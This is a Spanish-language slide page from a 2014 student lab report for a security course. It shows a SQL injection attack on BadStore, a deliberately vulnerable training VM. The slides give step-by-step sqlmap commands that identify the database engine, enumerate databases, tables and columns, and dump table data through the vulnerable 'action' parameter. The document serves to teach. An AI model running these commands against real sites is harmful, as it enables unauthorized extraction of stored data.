Imagen abstracta de una mujer sentada en libros y estudiando en una computadora portátil

Ataque inyeccion sql

Descargar como PPTX, PDF
Daniel L., profile picture
Daniel L.

El documento describe un ataque de inyección de código SQL utilizando una máquina virtual con una imagen ISO de Badstore. Se detalla el proceso de identificación de vulnerabilidades en el sitio web, así como el uso de comandos específicos para extraer información, como la base de datos y las tablas. La guía es técnica y se centra en los comandos de sqlmap para manipular y obtener datos de la base de datos afectada.

Internet
1 de 9
Descargado 10 veces
1
2
3
4
5
6
7
8
9
Especialización en Seguridad Informática • Ataque por inyección de código SQL Estudiante: Daniel Felipe Palomo Luna Ibagué, Septiembre de 2014
Ataque por inyección de código SQL 1. Teniendo la imagen ISO de BadStore configurada en una maquina virtual de Virtualbox, se procede a conocer la dirección IP asignada para ingresar vía web desde el equipo donde se realizara el ataque a la Base de Datos.
2. Luego de conocer la dirección IP, en este caso asignada la 192.168.1.3 mediante DHCP, se procede a ingresar desde un navegador web para verificar el funcionamiento del servidor web. Ataque por inyección de código SQL
3. Dentro del sitio web, se debe explorar cada uno de los menús para visualizar las diferentes páginas alojadas, con esto se logra obtener en la URL la primera vulnerabilidad: Manejo de variables con métodos GET Y POST Variable encontrada: action Ataque por inyección de código SQL
Ataque por inyección de código SQL 4. Al conocer una de las variables que maneja la página a nivel de programación, se logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
Ataque por inyección de código SQL 5. Obtención del nombre de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db
Ataque por inyección de código SQL 6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb
Ataque por inyección de código SQL 7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
Ataque por inyección de código SQL 8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump

Más contenido relacionado

PPTX
Ataque por inyección de código sql
JOSE ALFREDO RAMIREZ PRADA
 
PPTX
Practica 1 seguridad en bases de datos
Carlos Otero
 
PDF
Ataque por inyección de código sql y sniffing
Magda Mayery Baquero Cardona
 
PPTX
Ataques a bases de datos
Fernando Hernandez
 
PPTX
Apache cassandra cosnola
Chrïstôphër Jârämïllô
 
PPTX
Ataque sql web
kateqr
 
PPTX
2. ataque por inyección de código sql a sitio web
JOSE ALFREDO RAMIREZ PRADA
 
DOCX
Ejercicio3 mysql
María Luisa Velasco
 
Ataque por inyección de código sql
JOSE ALFREDO RAMIREZ PRADA
 
Practica 1 seguridad en bases de datos
Carlos Otero
 
Ataque por inyección de código sql y sniffing
Magda Mayery Baquero Cardona
 
Ataques a bases de datos
Fernando Hernandez
 
Apache cassandra cosnola
Chrïstôphër Jârämïllô
 
Ataque sql web
kateqr
 
2. ataque por inyección de código sql a sitio web
JOSE ALFREDO RAMIREZ PRADA
 
Ejercicio3 mysql
María Luisa Velasco
 

La actualidad más candente (7)

PDF
Servidor FTP con usuarios en MySQL
Carlos Escribano
 
DOCX
Practica de replicacion maestro esclavo en mysql
Sinuhé Pérez Mtz
 
PDF
Manual Técnico Para Hacer Réplica
Andrés Pizarro
 
PDF
Actividad No. 1.6: Creación de bases de datos en MySQL
Francisco Medina
 
PDF
Autentificacion sql antonio_hermoso
Antonio Hermoso González
 
DOCX
Respaldando bd
María Luisa Velasco
 
PPT
Pendrive Linux
mallita
 
Servidor FTP con usuarios en MySQL
Carlos Escribano
 
Practica de replicacion maestro esclavo en mysql
Sinuhé Pérez Mtz
 
Manual Técnico Para Hacer Réplica
Andrés Pizarro
 
Actividad No. 1.6: Creación de bases de datos en MySQL
Francisco Medina
 
Autentificacion sql antonio_hermoso
Antonio Hermoso González
 
Respaldando bd
María Luisa Velasco
 
Pendrive Linux
mallita
 
Publicidad

Similar a Ataque inyeccion sql (20)

PPTX
Ataque con inyeccion de codigo sql a sitio web
Daycith Gonzalez
 
PDF
Presentacion practica seguridad bd
Jaider Contreras
 
PDF
reto-by-q3rv0
q3rv0
 
PDF
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Francisco Medina
 
PDF
Tutorial CodeIgniter + Netbeans 7
Juan Fede
 
PDF
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
Nextel S.A.
 
PDF
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
Pablo Garaizar
 
PDF
William fabricio manual de sistemas sas
Rafael Toro
 
PDF
6.2.4.4 Packet Tracer - Router and Switch Resilience.pdf
informaticampt2016
 
PDF
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Francisco Medina
 
PPT
Symfony Parte 2
Rodrigo Miranda
 
PDF
Ataque masivo a WordPress con ILLOWP
QuantiKa14
 
PDF
Forense en WordPress
QuantiKa14
 
PPTX
Creación de una base de datos en el hosting
OSCARANDRESALBAPADRO
 
PDF
Introducción a las vulnerabilidades web
Pablo Garaizar
 
PDF
Deploying Wordpress
byroncorrales
 
PDF
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
Morely Garcia Leon
 
PPTX
CouchDB y el desarrollo de aplicaciones Android
Ricardo Monagas Medina
 
PDF
Infografia farmacia laravel
FUNDET ECUADOR
 
PPTX
Dns spoofing kali linux
Jasvleidy Fajardo
 
Ataque con inyeccion de codigo sql a sitio web
Daycith Gonzalez
 
Presentacion practica seguridad bd
Jaider Contreras
 
reto-by-q3rv0
q3rv0
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Francisco Medina
 
Tutorial CodeIgniter + Netbeans 7
Juan Fede
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
Nextel S.A.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
Pablo Garaizar
 
William fabricio manual de sistemas sas
Rafael Toro
 
6.2.4.4 Packet Tracer - Router and Switch Resilience.pdf
informaticampt2016
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Francisco Medina
 
Symfony Parte 2
Rodrigo Miranda
 
Ataque masivo a WordPress con ILLOWP
QuantiKa14
 
Forense en WordPress
QuantiKa14
 
Creación de una base de datos en el hosting
OSCARANDRESALBAPADRO
 
Introducción a las vulnerabilidades web
Pablo Garaizar
 
Deploying Wordpress
byroncorrales
 
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
Morely Garcia Leon
 
CouchDB y el desarrollo de aplicaciones Android
Ricardo Monagas Medina
 
Infografia farmacia laravel
FUNDET ECUADOR
 
Dns spoofing kali linux
Jasvleidy Fajardo
 
Publicidad

Último (20)

PDF
Webinar Jscrambler & Integrity360 Update
info937732
 
PDF
.GUIA DE GUIA DE TRABAJO NUEVO TESTAMENTO.pdf
leydysecundaria
 
DOCX
Proyecto del instituto Gilda Ballivian Rosado
jortanrc29
 
PDF
Libro de Oraciones guia virgen peregrina
gomeztorresv76
 
PPTX
Plantilla-Hardware-Informático-oficce.pptx
qdt06026
 
PPTX
Charla 3 - La gestión de servicios de TI.pptx
felixcm88
 
PPTX
presentación sobre Programación SQL.pptx
ecinformatica6
 
PPTX
NACIONALIDAD Y CIUDADANIA (1).pptxggggfffddd
juanvargas813701
 
PDF
MU_Gestion_Internacional_Edificacion_Construccion_MBA.pdf
nehemiaherik
 
PDF
EL BRANDBOOK MUNDUS DE PERFUMERIA NICHO
DaveShovelfloors
 
DOCX
TRABAJO DE ESTRATEGIA MAXIMILIANO ELIZARRARAS.docx
edepmaximilianoeliza
 
PPTX
PRESENTACION NIA 220 idhsahdjhJKSDHJKSHDJSHDJKHDJHSAJDHJKSAHDJkhjskdhasjdhasj...
GerardoRodriguez579394
 
PPSX
00 Elementos de la Ventana de Excel.ppsx
WILLIAMSVICENTEROLDA
 
PPTX
PARTE DE UNA PC _ SEIRY.pptx.........................
SeirySarahiMartinezP
 
PPTX
Informática e inteligencia artificial (2).pptx
fabianyirojas2
 
PPTX
jajajajajajajajajajjajajajajjajajajahdegdhwgfedhgfdhdfe
CristhianJampierFlor
 
PDF
AWS CloudOpS training español (Operaciones en la nube)
arturomartinezv2
 
PPT
redes.ppt unidad 2 perteneciente a la ing de software
KevinJoelZambranoLuc
 
PDF
LA INTELIGENCIA ARTIFICAL SU HISTORIA Y EL FUTURO
emiliosandovalparral
 
PDF
como me enamore de ti (1).pdf.pdf_20250813_191720_0000.pdf
AlinaSalas3
 
Webinar Jscrambler & Integrity360 Update
info937732
 
.GUIA DE GUIA DE TRABAJO NUEVO TESTAMENTO.pdf
leydysecundaria
 
Proyecto del instituto Gilda Ballivian Rosado
jortanrc29
 
Libro de Oraciones guia virgen peregrina
gomeztorresv76
 
Plantilla-Hardware-Informático-oficce.pptx
qdt06026
 
Charla 3 - La gestión de servicios de TI.pptx
felixcm88
 
presentación sobre Programación SQL.pptx
ecinformatica6
 
NACIONALIDAD Y CIUDADANIA (1).pptxggggfffddd
juanvargas813701
 
MU_Gestion_Internacional_Edificacion_Construccion_MBA.pdf
nehemiaherik
 
EL BRANDBOOK MUNDUS DE PERFUMERIA NICHO
DaveShovelfloors
 
TRABAJO DE ESTRATEGIA MAXIMILIANO ELIZARRARAS.docx
edepmaximilianoeliza
 
PRESENTACION NIA 220 idhsahdjhJKSDHJKSHDJSHDJKHDJHSAJDHJKSAHDJkhjskdhasjdhasj...
GerardoRodriguez579394
 
00 Elementos de la Ventana de Excel.ppsx
WILLIAMSVICENTEROLDA
 
PARTE DE UNA PC _ SEIRY.pptx.........................
SeirySarahiMartinezP
 
Informática e inteligencia artificial (2).pptx
fabianyirojas2
 
jajajajajajajajajajjajajajajjajajajahdegdhwgfedhgfdhdfe
CristhianJampierFlor
 
AWS CloudOpS training español (Operaciones en la nube)
arturomartinezv2
 
redes.ppt unidad 2 perteneciente a la ing de software
KevinJoelZambranoLuc
 
LA INTELIGENCIA ARTIFICAL SU HISTORIA Y EL FUTURO
emiliosandovalparral
 
como me enamore de ti (1).pdf.pdf_20250813_191720_0000.pdf
AlinaSalas3
 

Ataque inyeccion sql

  • 1. Especialización en Seguridad Informática • Ataque por inyección de código SQL Estudiante: Daniel Felipe Palomo Luna Ibagué, Septiembre de 2014
  • 2. Ataque por inyección de código SQL 1. Teniendo la imagen ISO de BadStore configurada en una maquina virtual de Virtualbox, se procede a conocer la dirección IP asignada para ingresar vía web desde el equipo donde se realizara el ataque a la Base de Datos.
  • 3. 2. Luego de conocer la dirección IP, en este caso asignada la 192.168.1.3 mediante DHCP, se procede a ingresar desde un navegador web para verificar el funcionamiento del servidor web. Ataque por inyección de código SQL
  • 4. 3. Dentro del sitio web, se debe explorar cada uno de los menús para visualizar las diferentes páginas alojadas, con esto se logra obtener en la URL la primera vulnerabilidad: Manejo de variables con métodos GET Y POST Variable encontrada: action Ataque por inyección de código SQL
  • 5. Ataque por inyección de código SQL 4. Al conocer una de las variables que maneja la página a nivel de programación, se logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
  • 6. Ataque por inyección de código SQL 5. Obtención del nombre de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db
  • 7. Ataque por inyección de código SQL 6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb
  • 8. Ataque por inyección de código SQL 7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
  • 9. Ataque por inyección de código SQL 8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump